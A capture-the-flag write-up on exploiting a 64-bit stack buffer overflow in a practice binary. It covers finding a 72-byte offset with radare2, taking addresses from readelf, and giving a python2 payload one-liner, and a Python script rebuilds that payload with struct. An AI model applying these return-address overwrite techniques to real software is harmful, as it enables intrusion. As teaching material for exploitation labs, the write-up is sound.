Lets try moving to 64-bit, but don't worry we'll start easy. Overflow the buffer and change the return address to the flag function in this program. You can find it in /problems/newoverflow-1_3_e53f871ba121b62d35646880e2577f89 on the shell server. Source.
1. Find the offset/padding. Run `pdf @ sym.vuln` in radare2 to get the stack layout of `vuln`:

   `var int local_40h @ rbp-0x40`

   `0x40` (64 bytes) is the buffer's distance from `rbp`, so 8 more bytes are needed to get past the saved base pointer (`rbp`) before we reach the return address.
2. So the offset is 0x40 + 8 = 72 bytes.
3. Run `readelf -s vuln` to get the addresses of `main` and `flag`.
4. We can not simply pad and jump to the `flag` function directly, because that would cause a stack misalignment in 64-bit. So instead we form our payload as `padding + main_address + flag_address` instead of just `padding + flag_address` as we would in 32-bit.
5. We can use `p64` from pwntools to convert the hex addresses to 8-byte little-endian strings.
6. Payload complete:

   ```
   python2 -c "print 'A'*72 + '\xcb\x07@\x00\x00\x00\x00\x00' + 'g\x07@\x00\x00\x00\x00\x00'" | ./vuln
   ```
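As an added example (not part of the original writeup), the script below builds the same payload with the standard library's `struct` in place of pwntools' `p64`, and decodes it back into the two addresses. It shows why the escaped bytes in the one-liner look the way they do: `0x4007cb` packed little-endian is `cb 07 40 00 00 00 00 00`, and `0x40` is the ASCII character `@`, which is why `@` appears in the middle of each address. The offset (0x40 + 8) and the two addresses (`0x4007cb` for `main`, `0x400767` for `flag`) are taken from the writeup's own payload; they are assumed here rather than read from the binary.

```python
import struct

# Offset from the writeup: buffer at rbp-0x40 (64 bytes) plus 8 bytes of saved rbp.
BUFFER_OFFSET = 0x40 + 8  # 72

# Addresses decoded from the escaped bytes in the writeup's payload (assumed, not
# re-read from the binary): '\xcb\x07@\x00...' and 'g\x07@\x00...'.
MAIN_ADDR = 0x4007CB
FLAG_ADDR = 0x400767


def p64(value):
    """Pack an integer as 8 little-endian bytes (same result as pwntools' p64)."""
    return struct.pack("<Q", value)


def u64(data):
    """Inverse of p64: 8 little-endian bytes back to an integer."""
    return struct.unpack("<Q", data)[0]


def build_payload(offset=BUFFER_OFFSET, main_addr=MAIN_ADDR, flag_addr=FLAG_ADDR):
    """padding + main_address + flag_address, as described in the writeup."""
    return b"A" * offset + p64(main_addr) + p64(flag_addr)


def decode_payload(payload, offset=BUFFER_OFFSET):
    """Split a payload back into (padding length, first address, second address)."""
    padding = payload[:offset]
    first = u64(payload[offset : offset + 8])
    second = u64(payload[offset + 8 : offset + 16])
    return len(padding), first, second


if __name__ == "__main__":
    payload = build_payload()
    # Same bytes the python2 one-liner prints, shown as an escaped string.
    print(repr(payload))
    print(decode_payload(payload))  # (72, 0x4007cb, 0x400767)
```

The byte `0x40` lands in the third position of every address in this binary's text segment, so any printable-looking `@` in the payload is just part of an address, not a delimiter.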